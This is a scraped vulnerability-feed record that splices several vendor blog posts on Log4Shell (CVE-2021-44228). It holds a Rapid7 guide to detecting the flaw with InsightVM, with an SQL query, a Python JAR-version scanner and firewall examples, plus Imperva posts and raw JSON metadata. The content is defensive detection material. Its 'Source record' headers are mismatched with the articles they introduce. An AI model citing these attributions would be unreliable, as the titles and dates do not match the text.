 * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_
 * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_
 * _[Active Exploitation of VMware Horizon Servers](<https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/>)_
 * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_
 * _[The Everyperson's Guide to Log4Shell (CVE-2021-44228)](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_

**Source record:** Rapid7 blog, "Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal", published 2022-02-17, CVE-2021-44228 (CVSS 3.1 base score 10.0, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS 2.0 base score 9.3, vector AV:N/AC:M/Au:N/C:C/I:C/A:C), <https://blog.rapid7.com/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>

# Using InsightVM to Find Apache Log4j CVE-2021-44228

There are many methods InsightVM can use to identify vulnerable software. Which method is best depends on the software and specific vulnerability in question, not to mention variability that comes into play with differing network topologies and Scan Engine deployment strategies. When it comes to a vulnerability like [CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), affecting a software library (Log4j) that is used to build other software products and may not expose its presence in an obvious way, the situation gets even more complicated. For in-depth analysis on the vulnerability and its attack surface area, [see AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>).

The intent of this post is to walk InsightVM and Nexpose users through how to best approach detecting exposure to Log4Shell in your environment, while providing some additional detail about how the various checks work under the hood. This post assumes you already have an operational deployment of [InsightVM](<https://www.rapid7.com/products/insightvm/>) or [Nexpose](<https://www.rapid7.com/products/nexpose/>). For additional documentation on scanning for Log4j CVE-2021-44228, take a look at [our docs here](<https://docs.rapid7.com/insightvm/apache-log4j/>).

## Before (or while) you scan

Even before a vulnerability check has been made available, it can be possible to get a sense of your exposure using InsightVM features such as [Query Builder](<https://www.rapid7.com/blog/post/2020/01/13/simplify-your-data-search-with-query-builder-in-insightvm/>), or Nexpose's [Dynamic Asset Groups](<https://docs.rapid7.com/nexpose/working-with-asset-groups/>). Because we use generic fingerprinting techniques such as querying Linux package managers and enumerating software found in Windows Registry uninstaller keys, the software inventory for assets may include products that are not explicitly supported.
Using the search predicate `software.product` `CONTAINS` `log4j` will show packages on Linux systems that have been installed via package managers such as `rpm` or `dpkg`.

An alternative approach to this is using an [SQL Query Export](<https://docs.rapid7.com/nexpose/creating-reports-based-on-sql-queries/>) using the following query:

```sql
-- Software inventory rows (joined to their assets) whose product name
-- contains "log4j", matched case-insensitively with ILIKE.
SELECT
  da.sites AS "Site_Name",
  da.ip_address AS "IP_Address",
  da.mac_address AS "MAC_Address",
  da.host_name AS "DNS_Hostname",
  ds.vendor AS "Vendor",
  ds.name AS "Software_Name",
  ds.family AS "Software_Family",
  ds.version AS "Software_Version",
  ds.software_class AS "Software_Class"
FROM
  dim_asset_software das
JOIN
  dim_software ds USING (software_id)
JOIN
  dim_asset da ON da.asset_id = das.asset_id
WHERE
  ds.software_class LIKE '%'
  AND ds.name ILIKE '%log4j%'
ORDER BY
  ds.name ASC
```

## Authenticated and agent-based assessments

The most reliable way to find vulnerable instances of CVE-2021-44228 is via our authenticated checks (check IDs: `apache-log4j-core-cve-2021-44228`, `apache-log4j-core-cve-2021-44228-2_16`), which perform a complete filesystem search for JAR files matching `log4j-core.*.jar`. The authenticated checks support both Linux and Windows scanning as of version 6.6.121, released December 17, 2021. **Note:** Searching entire file systems across Windows assets is an intensive process that may increase scan time and resource utilization. To allow this, you can [enable Windows file system searching in the scan template](<https://docs.rapid7.com/insightvm/apache-log4j/#authenticated-and-unauthenticated-remote-checks>) in order to use the authenticated check for Log4j on Windows systems.

In addition to enabling Windows file system search, WMI must be enabled for the authenticated check to run in Windows environments. The check looks for Log4j version information in the JAR filename.
On Linux systems, when the `unzip` command is available, that command is used to extract the version from the JAR's manifest file. There is also a fallback mechanism that allows the scanner to attempt to extract the version information from the filename. Customers should ensure they are running version 6.6.121 of the Scan Engine and Console.

For the find command to run and locate vulnerable JARs, **scans must be configured with root credentials** (either directly or via a privilege elevation mechanism) in the Site Configuration interface. On Windows systems, scans should run with local administrator privileges for the most comprehensive results.

Windows scanning functionality requires product version 6.6.121 or later. Insight Agent collection on Windows for Log4j has begun rolling out in version 3.1.2.38 as of December 17, 2021. It will take several days for this roll-out to complete. If you are using the Insight Agent to assess your assets for vulnerabilities and you are not yet on version 3.1.2.38, you can uncheck the "[Skip checks performed by the Agent](<https://docs.rapid7.com/insightvm/enable-complementary-scanning-for-scan-engines-and-insight-agents/>)" option in the scan template to ensure that authenticated checks run on Windows systems.
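The authenticated check's logic, as an added Python example that is not InsightVM or Nexpose code: walk a directory tree for `log4j-core*.jar`, read `Implementation-Version` from the JAR manifest (the `unzip` path described above), fall back to the filename, and flag 2.x versions below 2.15.0 as affected by CVE-2021-44228. It assumes the tree to search is passed as `root` (a real scanner walks the whole host) and that 2.15.0 is the fix version; the sample JARs are constructed inline.

```python
"""Inventory log4j-core JARs under a directory tree and flag versions affected
by CVE-2021-44228: find log4j-core*.jar, read the version from
META-INF/MANIFEST.MF, and fall back to the filename when the manifest does
not carry one.

Added example; this is not InsightVM/Nexpose code. The sample JARs built by
build_sample_tree() are constructed fixtures (tiny zip files), not real Log4j.
"""
from __future__ import annotations

import os
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

# Filename pattern equivalent to the page's `log4j-core.*.jar` search.
JAR_NAME_RE = re.compile(r"^log4j-core-?(?P<ver>[\d.]+)?.*\.jar$", re.IGNORECASE)
MANIFEST_PATH = "META-INF/MANIFEST.MF"
# 2.15.0 was the first release with the JNDI lookup fix for CVE-2021-44228;
# pass fixed=(2, 16, 0) to mirror the stricter *-2_16 check named on the page.
FIXED_IN = (2, 15, 0)


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); a suffix such as '-rc1' or '-beta9' is ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else ()


def is_affected(version: Optional[str], fixed: tuple = FIXED_IN) -> Optional[bool]:
    """True for a 2.x version below the fix; None when the version is unknown."""
    if version is None:
        return None
    v = parse_version(version)
    return bool(v) and v[0] == 2 and v < fixed


def version_from_manifest(jar_path: str) -> Optional[str]:
    """Implementation-Version from the JAR manifest (what `unzip` exposes)."""
    try:
        with zipfile.ZipFile(jar_path) as zf:
            raw = zf.read(MANIFEST_PATH).decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError, OSError):
        return None
    # Manifest values may wrap onto a following line that starts with a space.
    text = raw.replace("\r\n", "\n").replace("\n ", "")
    for line in text.split("\n"):
        key, _, value = line.partition(":")
        if key.strip() == "Implementation-Version" and value.strip():
            return value.strip()
    return None


def version_from_filename(name: str) -> Optional[str]:
    """Fallback: the version embedded in a name like log4j-core-2.14.1.jar."""
    m = JAR_NAME_RE.match(name)
    return m.group("ver").rstrip(".") if m and m.group("ver") else None


def scan(root: str) -> list[dict]:
    """Walk `root` like the scanner's filesystem search and classify each hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not JAR_NAME_RE.match(fname):
                continue
            path = os.path.join(dirpath, fname)
            version, source = version_from_manifest(path), "manifest"
            if version is None:
                version, source = version_from_filename(fname), "filename"
            findings.append({
                "name": fname, "path": path, "version": version,
                "source": source if version else "unknown",
                "affected": is_affected(version),  # None => needs manual review
            })
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed fixtures: minimal zip files standing in for real JARs."""
    lib = Path(root, "app", "lib")
    other = Path(root, "other")
    lib.mkdir(parents=True)
    other.mkdir()
    with zipfile.ZipFile(lib / "log4j-core-2.14.1.jar", "w") as zf:
        zf.writestr(MANIFEST_PATH, "Manifest-Version: 1.0\r\nImplementation-Version: 2.14.1\r\n")
    with zipfile.ZipFile(lib / "log4j-api-2.14.1.jar", "w") as zf:  # not log4j-core: skipped
        zf.writestr(MANIFEST_PATH, "Implementation-Version: 2.14.1\n")
    with zipfile.ZipFile(other / "log4j-core-2.17.1.jar", "w") as zf:  # no version in manifest
        zf.writestr(MANIFEST_PATH, "Manifest-Version: 1.0\n")
    with zipfile.ZipFile(other / "log4j-core.jar", "w") as zf:  # renamed, no version anywhere
        zf.writestr("placeholder.txt", "")


def demo() -> list[dict]:
    """Build the fixtures in a temporary directory and return the sorted findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted(scan(tmp), key=lambda f: f["name"])


if __name__ == "__main__":
    for f in demo():
        flag = {True: "AFFECTED", False: "ok", None: "REVIEW"}[f["affected"]]
        print(f"{flag:8} {f['version'] or '?':8} via {f['source']:8} {f['path']}")
```

A JAR whose version cannot be determined from either source is reported with `affected` set to `None` rather than silently passed, which is the case a scanner should surface for manual review.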

Use the [Agent Management](<https://docs.rapid7.com/insight-agent/agent-management/>) interface to determine the version of the Agent being used in your environment.

Read more about scanning for Log4Shell [here](<https://docs.rapid7.com/insightvm/apache-log4j/>) or visit our [Customer Resource Center](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>).

## Remote scanning

**IMPORTANT:** For the unauthenticated remote check to correctly identify Log4Shell occurrences in your environment, target assets must be able to communicate back to your scan engine on port 13456.

A remote (unauthenticated) check for CVE-2021-44228 was published in a content release on December 12 at 9pm ET with Check ID `apache-log4j-core-cve-2021-44228-remote`. This check is platform-independent (it will work against Linux, Windows, and other operating systems) and works as follows:

 * **IF** any of the following TCP ports are found open: 80, 443, 8080, 8888 — or, alternatively, if [Nmap service fingerprinting](<https://www.rapid7.com/blog/post/2020/04/16/nmap-service-detection-for-nexpose-and-insightvm-scan-engines/>) detects HTTP or HTTPS running (note that enabling Nmap service fingerprinting may negatively impact scan times)
 * **THEN** the Scan Engine will attempt to exploit the vulnerability and make the scan target open a connection to the Engine on port 13456.
 * The Engine does not open a TCP listener but does a packet capture to identify connection attempts against 13456/TCP. If a connection attempt to the Engine is detected, this indicates that the target is vulnerable, and the check will fire accordingly. No data is returned from the scanned asset itself; the Engine is only monitoring for connection attempts, and not any additional data.
 * This approach relies on bi-directional networking and requires the scan engine and scan target to be able to "talk" to each other. In some cases, such as scanning through a VPN, NAT, or firewall, that required bi-directional networking is not available.

##### Further information on enabling bi-directional communication

 1. Create a rule in your firewall (or Layer 3 switch) to allow your Windows Asset / Network Segment (so in this case 192.168.1.10) to respond BACK to your Scan Engine (10.10.190.4) on TCP 13456.
    `Source 192.168.1.10 Service TCP 13456 Destination 10.10.190.4`
 2. You should already have a rule from your Scan Engine to allow scanning on ports 80, 443, 8080 and 8888 to your Windows Asset / Network Segment.
    `Source 10.10.190.4 Service 80/443/8080/8888 Destination 192.168.1.255`
 3. If you are not seeing any response back, or you are finding ZERO vulnerabilities, it is very possible that the issue is with the firewall rule (or network configuration). Check your firewall logs for any drops from the Windows Asset on port 13456 attempting to talk to your Scan Engine. Also make sure that your Scan Engine is allowed to make the request to your Network Segments on ports 80, 443, 8080, 8888 to initialize the trap/attack.

## Product-based checks

We know that many downstream vendors will issue security advisories of their own in the coming days and weeks. We continue to monitor several vendors for related security advisories. We will have checks for affected products included in our [recurring coverage list](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>) as vendors provide details about affected and/or fixed versions.
Users can also adapt the Query Builder or SQL Export queries provided above to find products of concern in the meantime, with the caveat that they may not be visible if they use non-standard installation mechanisms.

## Specific vulnerability dashboard and Log4j helpful query

Rapid7 released the Specific Vulnerability Dashboard template and the "Log4j by CVE ID" helpful query in the Query Builder on Tuesday, December 13, 2021. Our intent is to allow customers to quickly and easily report on the Log4j vulnerability. More importantly, this gives us a dashboard template that we can leverage in the event of other urgent vulnerability notices.

The Helpful Query searches a customer's environment for Log4j via the corresponding CVE ID (not paradoxically). Users can apply this query to the Specific Vulnerability [dashboard template](<https://docs.rapid7.com/insightvm/dashboards>) to create a view into how their environment is being affected.

Follow these steps to create and focus this new dashboard template on Log4j.

 * Navigate to the Query Builder.
 * Click on the Add button.
 * Go to the Helpful Queries section and select the Log4j by CVE ID query.
 * Click the Select Query button.
 * Click Save As for the new query.
 * Give the query a name.
 * Click the Save button.
 * Go to the Dashboards page.
 * Click on the down arrow next to the dashboard name.
 * Select Specific Vulnerability Dashboard.
 * Edit the information provided if desired.
 * Click the OK button.
 * To filter the dashboard for Log4j:
   * Click the Load Dashboard Filter button.
   * Search for your saved Log4j query.
   * Click on the name of the query.

InsightVM users may also create a report that's based on the Specific Vulnerability dashboard template and have this generated on a recurring basis (every N days, weeks or months). Follow these steps in order to create this report.

 * Navigate to the Query Builder.
 * Click on the Add button.
 * Go to the Helpful Queries section and select the Log4j by CVE ID query.
 * Once loaded, click the Create Report button.
 * In the report wizard, select Pre-built Reports as the report type.
 * From the list that appears, select Specific Vulnerability Dashboard.
 * Enter the relevant information in the Configure selection.
 * Select "I want to schedule and run a recurring report" to have the report generated multiple times.
 * Click the checkbox titled "Permit users who do not have access to console," and enter an email address or addresses to have this report automatically delivered as it's generated.
 * Once ready, click the Save and Complete button.

We hope these additions will help InsightVM users respond to the threat of Log4Shell and reduce friction in identifying its impact to their environments.

## Container security

Customers who are worried about vulnerable images in their container repos have been able to scan for CVE-2021-44228 using InsightVM's [Container Security](<https://www.rapid7.com/products/insightvm/features/container-security/>) since December 10 at 2pm ET, thanks to our integration with the [Snyk vulnerability database](<https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720>). It is also possible to [rerun an assessment](<https://docs.rapid7.com/insightvm/managing-container-images#Reassessing-an-image>) on any images that are particularly sensitive to be sure of up-to-date results.
Retrieve results via the [Container API](<https://help.rapid7.com/insightvm/en-us/api/api.html#tag/Container>) or the Containers Dashboard.

**Source record:** Rapid7 blog, "Using InsightVM to Find Apache Log4j CVE-2021-44228", published 2021-12-14, CVE-2021-44228 (CVSS 3.1 base score 10.0, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H; CVSS 2.0 base score 9.3, vector AV:N/AC:M/Au:N/C:C/I:C/A:C), <https://blog.rapid7.com/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>

# 2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022

One of the core principles of cybersecurity is not letting things "slip through the cracks". An effective security posture depends on visibility.
The more visibility you have into the environments where your data is, the more successful you will be in applying your organization's security protocols and identifying suspicious behavior.

Here are five cybersecurity issues that may have "slipped through the cracks" which should be visible to you in 2022.

## [5. Exploiting third-party applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>)

Many people have characterized 2021 as "the year of the [software supply chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>)". Chances are if you were not following the issue closely, you are now in light of the new [CVE-2021-44228 vulnerability](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>).

[Zero-day attacks](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), or unpatched security bugs, in commonly used third-party applications are an example of the risks we assume from our software supply chain. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don't typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn't intended to do, like steal other users' credentials or read the entire contents of a database. Compounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It's rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Even the best Web Application Firewalls require time to adapt, whether with a new signature update (that must be developed, tested, and deployed), with an adjustment to a machine learning model, or with manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these "virtual patches" must be tested in each specific environment prior to deployment to ensure they don't cause unwanted side effects.

For more on how to manage software supply chain attacks, get [**5 Key Ways Supply Chain Attacks Occur**](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>).

## [4. Increases in the volume of records stolen](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>)

The constant increase in the volume of stolen records is the result of multiple factors. We are living in a digitalization era in which more services are consumed daily, the majority of them online, so the amount of data out there increases every year. More businesses have made a very quick shift into digitalization, which, if not done carefully, increases security risk. Information security adoption is slower than the adoption of digital services that make a profit from the addiction to and consumption of the same online services. Such a fast, dramatic change is likely to have security implications. Higher-volume, less secure data is now stolen in ever-larger chunks. Organizations need to rethink how they protect the growing body of critical business data.

Learn more about this in [**Lessons Learned from Analyzing 100 Data Breaches**](<https://www.imperva.com/resources/resource-library/white-papers/lessons-learned-from-analyzing-100-data-breaches/>).

## [3. More effective Web Application Firewall Gateway technology](<https://www.imperva.com/blog/impervas-waf-gateway-14-4-protects-enterprises-for-the-post-covid-era/>)

A [recent report](<https://www.verizon.com/business/resources/reports/dbir/>) revealed 39% of all data breaches in 2020 stemmed from web application compromise, a trend that became more pronounced in 2021. Organizations need to get more effective protection from their Web Application Firewalls (WAFs). Here are some of the things your WAF needs to do to take on today's web application threat vectors:

[More than 24 percent of internet traffic is bad bots](<https://www.imperva.com/resources/resource-library/reports/2020-Bad-Bot-Report/>), so your WAF should offer [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that enables true defense-in-depth security in a single stack model.

Your WAF should provide optimized security and performance benefits for your digital protocols, from HTTP/2 to TLS 1.3. For activities such as serving more dynamic content, from video snippets to 3D visuals, your WAF should facilitate your ability to supersize the customer experience from website to smartphone to support your organization's omnichannel strategies.

Learn more about next-level WAF Gateway [here](<https://www.imperva.com/resources/resource-library/datasheets/imperva-waf-gateway/>).

## [2. New bad bot mitigation strategies](<https://www.imperva.com/blog/bad-bots-continue-to-evolve-your-mitigation-strategy-should-too/>)

Bad actors are capitalizing on the opportunities that digital transformation creates, particularly through more sophisticated automated bad bot attacks. But tools to thwart these attacks have become more advanced, too. What should you look for in a solution?

A truly "future-proof" bad bot solution will be equipped to handle the most sophisticated bad bots. It must incorporate machine learning that is capable of identifying bad bot behavior in real time and adapting. It also helps establish a baseline for normal behavior, as well as enabling automated detection and response. Your solution should be able to block bots from the very first request they make and protect all your access points: websites, mobile apps, and APIs.

Look for device fingerprinting, allowing the solution to track bot activity across IP addresses and detect browser automation tools. Such tools are capable of processing JavaScript and emulating legitimate browsers, making them more difficult to identify and block. The solution should contain cutting-edge techniques, such as injection of active challenges and honeypots into HTTP traffic; per-URL customization and security controls to fine-tune protection; graduated controls for rate-limiting, such as by client, device, authentication token, or simple IP address; and community-sourced threat intelligence to help customers learn from one another.

Learn more in [**Imperva's Ten Essential Capabilities of a Bot Management Solution**](<https://www.imperva.com/resources/resource-library/white-papers/buyers-guide-ten-essential-capabilities-of-a-bot-management-solution/>).

## [1. The economic impact of a data security platform](<https://www.imperva.com/blog/infographic-what-is-the-economic-impact-of-a-data-security-platform/>)

Virtually all cybersecurity professionals understand the need to create a data security platform to mitigate threats to sensitive data, but very few people know how to present the acquisition, development, and deployment of a data security platform as a business driver with a demonstrable ROI.

Establishing a starting point for the evolution of your data security platform can make all the difference. Articulating the challenges that your organization faces is the first step. Mapping these challenges to quantifiable benefits is the next.
Having a framework from which to start saves time because your team can modify data points to align with your organization\u2019s requirements. For example, regional salary assumptions and the number of systems to be protected. It also will likely open your eyes to scenarios that you may not have thought of, in the actual language from current consumers of data security technology that have already benefited from the transition.\n\nWhile it can be hard to show the economic impact of change, it\u2019s not impossible. Oftentimes it is easier to modify existing work (red pen) than start from scratch (black pen). [Download the infographic](<https://www.imperva.com/resources/resource-library/infographics/the-total-economic-impact-of-the-imperva-data-protection-solution/>), _The Total Economic Impact of the Imperva Data Protection Solution_ to see the key challenges that organizations faced prior to implementing a data security platform and the resulting benefits after deployment.\n\nThe post [2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022](<https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T10:44:57", "type": "impervablog", "title": "2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T10:44:57", "id": "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "href": "https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T10:37:09", "description": "[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) is a high profile vulnerability impacting multiple versions of a widely distributed Java software component, Apache Log4j 2. The specific vulnerability allows for unauthenticated remote code execution. For additional technical information, the team at LunaSec has an excellent technical writeup on their [blog](<https://www.lunasec.io/docs/blog/log4j-zero-day/>).\n\nIn terms of magnitude, this will without any doubt, have a big impact on all organizations running Java workloads. Similar to other common vulnerabilities and exposures (CVEs) in its class (referring to those affecting Struts 2 back in 2017), best practices require security teams to immediately patch their software and upgrade third-party components to meet SLAs.\n\nIn the spirit of transparency, we want to give everyone a succinct update on how Imperva responded and is continuing to focus on this specific CVE. \n\n# Imperva Threat Research Response & Observations\n\nImperva Threat Research sprang into action shortly after this zero-day exploit was made public. We saw initial attacks attempting to exploit this CVE starting around December 9, 2021 18:00 UTC. 
\n\n**Existing security rules put in place for Imperva Cloud WAF customers appear to have mitigated these early CVE attacks without requiring any patching.**\n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 11:44 UTC. \n\nThroughout the day, more attack variants were detected, resulting in the creation of additional rules and a deployment on December 10, 2021 22:46 UTC.\n\nAs of writing this blog post, and since rolling out the updated security rules more than 13 hours ago, Imperva has observed **1.4M+ attacks targeting CVE-2021-44228.**\n\nAs you can see from the graph above, we\u2019ve observed peaks reaching roughly **280K attacks** per hour. As with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\nAnother interesting property of this particular attack is the normal distribution across industries, which makes sense as Java is a very popular language for building applications and APIs.\n\nLooking at the distribution of attacks by country (illustrated above), there is nothing abnormal, which furthers our hypothesis that the attacks are trying to exploit a vulnerability rather than targeting specific industries or countries.\n\n# Another Strong Case for RASP\n\nIn 2018, Imperva acquired Prevoty, the market and analyst-recognized leader of [runtime application self-protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>). The rationale behind the acquisition was that organizations would want to have last-mile protection for applications and APIs, particularly as they became more dynamic and dependent on third-party software components. 
\n\nAs the lifecycle of CVE-2021-44228 is getting started, we can\u2019t help but be reminded of the myriad of Struts 2 CVEs from 2017. Similarly, organizations of all sizes are going to be forced to identify and patch first- and third-party applications and APIs. \n\nWe also recommend that customers implement RASP as part of a broader defense-in-depth strategy for protecting their applications and APIs. Some of Imperva\u2019s customers, including eCommerce and telco providers, have been able to save thousands of hours in emergency patching and speed up the secure software development lifecycle. **Customers that have Imperva RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.**\n\n# Ongoing Vigilance\n\nImperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants for all of our customers. We will keep all our customers notified as this progresses. \n\nFor customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com>).\n\nIf you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [How We\u2019re Protecting Customers & Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11